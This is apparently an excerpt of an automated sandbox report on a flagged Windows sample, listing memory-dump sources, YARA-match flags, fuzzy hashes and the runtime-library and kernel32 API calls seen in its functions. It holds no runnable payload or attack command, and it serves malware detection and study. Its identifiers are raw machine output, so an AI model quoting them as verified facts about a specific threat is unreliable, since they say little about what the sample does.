Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID:
• API String ID: 4227777306-0
• Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
• Instruction ID: e44a0fdabbb470493dd86413d3e395119676a6d187df121367f299fab4d0427f
• Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
• Instruction Fuzzy Hash: A8018F39681125AEDB24BF65EC48BAF3768AF42B52B600435FD15D3190DB74D904CAE8

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021166FB), ref: 021124A6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021124B4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021124C2
• GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021166FB), ref: 021124F0
• GetProcAddress.KERNEL32(00000000), ref: 021124F7
• GetLastError.KERNEL32(?,?,?,021166FB), ref: 02112512
• GetLastError.KERNEL32(?,?,?,021166FB), ref: 0211251E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112534
• __CxxThrowException@8.LIBVCRUNTIME ref: 02112542
Strings
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID: kernel32.dll
• API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                  • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                  • Instruction ID: 0f2ff7600054c2020bc6807b4cbb559bf5985a94fe1b643ed0df56a19453bcf8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF0A4B69403603FF6113B797D9995A3FACDD46A633240636F811D2292EB75C5008A68
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                                  • String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                  • API String ID: 2005118841-859722693
                                                                                                                                                                                                                                                  • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                                  • Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 0043115C
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004311CD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004311E6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431218
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431221
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043122D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275183328-0
                                                                                                                                                                                                                                                  • Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                                                                                                                                                                  • Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021325DC,00000001,00000001,?), ref: 021323E5
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021325DC,00000001,00000001,?,?,?,?), ref: 0213246B
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02132565
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 02132572
                                                                                                                                                                                                                                                    • Part of subcall function 021338FE: RtlAllocateHeap.NTDLL(00000000,0210DACD,00000000), ref: 02133930
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0213257B
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 021325A0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                                  • Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                                                                                                                                                                  • Instruction ID: 0a38d4e2c9dc6a613a5a974b382a8812dc51eebb68c003da96d964eb96db6374
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C851E172A80216AEDB26AE68CCA5EBE77ABEB44654F154228EC04D6150EB34DD40CA90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                                                                  • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                  • Instruction ID: be9d3b94be3af0b4fa162d112f8ade63deb3b79c8a8b3894b4406b1df48e7bac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D515B36980215AFDF249F68CC40FAE77AEEF4D334F104269F815D6181EB31E529CAA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02123041
                                                                                                                                                                                                                                                    • Part of subcall function 02118AA2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02118AAD
                                                                                                                                                                                                                                                  • SafeSQueue.LIBCONCRT ref: 0212305A
                                                                                                                                                                                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 0212311A
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0212313B
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02123149
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3496964030-0
                                                                                                                                                                                                                                                  • Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                                                                                                                                                                  • Instruction ID: 3221cd423c8fde33c961d06f584fa55d14c474abf891a9890b0766cc8c3d1db9
• Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
• Instruction Fuzzy Hash: F831E231A406259FCB29EF64C880BAEB7B1FF44710F1145A9E8168B291DB74E859CFD4
APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 02128F67
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 02128F80
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 02128F87
• PMDtoOffset.LIBCMT ref: 02128FA6
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: FindInstanceTargetType$Offset
• String ID:
• API String ID: 1467055271-0
• Opcode ID: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
• Instruction ID: 4e30abab93c16265ce10fe0c71a2ee901fa788073aa7fcb25b9ac576edfcc727
• Opcode Fuzzy Hash: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
• Instruction Fuzzy Hash: A5210B726842249FDF18DF68DC45F6E77A6EF44710F268129FD1593180D731E928CAB4
APIs
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
• Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
• Instruction ID: 4ad0405b518e857fee98f68054b77ddc933fe790dff3b995cc80c19e72007111
• Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
• Instruction Fuzzy Hash: CB217471C44209AEDF15EBF4D884BDD7BFAAF08325F54401AD404B71C0DBB899448E75
APIs
• GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,761D42DF), ref: 00428DD8
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
• SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,761D42DF), ref: 00428E51
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
• Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
• Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
• Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D
APIs
• GetLastError.KERNEL32(?,?,02129028,021269B9,021408F7,00000008,02140C5C,?,?,?,?,02123CA2,?,?,0045A064), ref: 0212903F
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0212904D
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02129066
• SetLastError.KERNEL32(00000000,?,02129028,021269B9,021408F7,00000008,02140C5C,?,?,?,?,02123CA2,?,?,0045A064), ref: 021290B8
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
• Instruction ID: 1293667675877915ce34a9ee9e9664c22e4cfee0db7e2e0e414fb890239ef203
• Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
• Instruction Fuzzy Hash: 7001F7321897356EA7282BB86C88A6B2759EF45776F300339F520451F1EF12883D998D
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
• int.LIBCPMT ref: 00404D70
  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
• std::locale::_Getfacet.LIBCPMT ref: 00404D79
• std::_Facet_Register.LIBCPMT ref: 00404DAA
• std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
• __CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
• Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
• Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
• Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
• Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 02104FC0
• int.LIBCPMT ref: 02104FD7
  • Part of subcall function 0210BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0210BFCA
  • Part of subcall function 0210BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0210BFE4
• std::locale::_Getfacet.LIBCPMT ref: 02104FE0
• std::_Facet_Register.LIBCPMT ref: 02105011
• std::_Lockit::~_Lockit.LIBCPMT ref: 02105027
• __CxxThrowException@8.LIBVCRUNTIME ref: 02105045
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
• Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
• Instruction ID: e9e81adcebdc217049cf6613bea21ebf66d9c49e8cce156cde1f17b7e84ea601
• Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
• Instruction Fuzzy Hash: 4A11EC32980228AFCF24EBA4D880AAD77B2BF04315F504429E811AB2D5CBB49A05CF90
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
• int.LIBCPMT ref: 0040C1A7
  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
• std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
• std::_Facet_Register.LIBCPMT ref: 0040C1E1
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040C215
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                                  • Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 004054F0
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 004054F9
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040552A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040555E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                                                                                                                                                                  • Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00405575
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 0040558C
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00405595
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004055C6
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004055FA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                                                                                                                                                                  • Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00404C32
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404C3B
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00404C6C
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                                  • Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0210C3F7
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 0210C40E
                                                                                                                                                                                                                                                    • Part of subcall function 0210BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0210BFCA
                                                                                                                                                                                                                                                    • Part of subcall function 0210BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0210BFE4
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0210C417
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0210C448
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0210C45E
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0210C47C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                                  • Instruction ID: 0f21323f4a8c745cb15df45e762c1e0c12e5756601777ac9851836ddcf810012
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
• Instruction Fuzzy Hash: F011E1728802289FCB14EBA0D8C0AFD7772BF44710F10451AE811AB2D1DBB49A05CFE1
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 02104E82
• int.LIBCPMT ref: 02104E99
  • Part of subcall function 0210BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0210BFCA
  • Part of subcall function 0210BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0210BFE4
• std::locale::_Getfacet.LIBCPMT ref: 02104EA2
• std::_Facet_Register.LIBCPMT ref: 02104ED3
• std::_Lockit::~_Lockit.LIBCPMT ref: 02104EE9
• __CxxThrowException@8.LIBVCRUNTIME ref: 02104F07
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
• Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
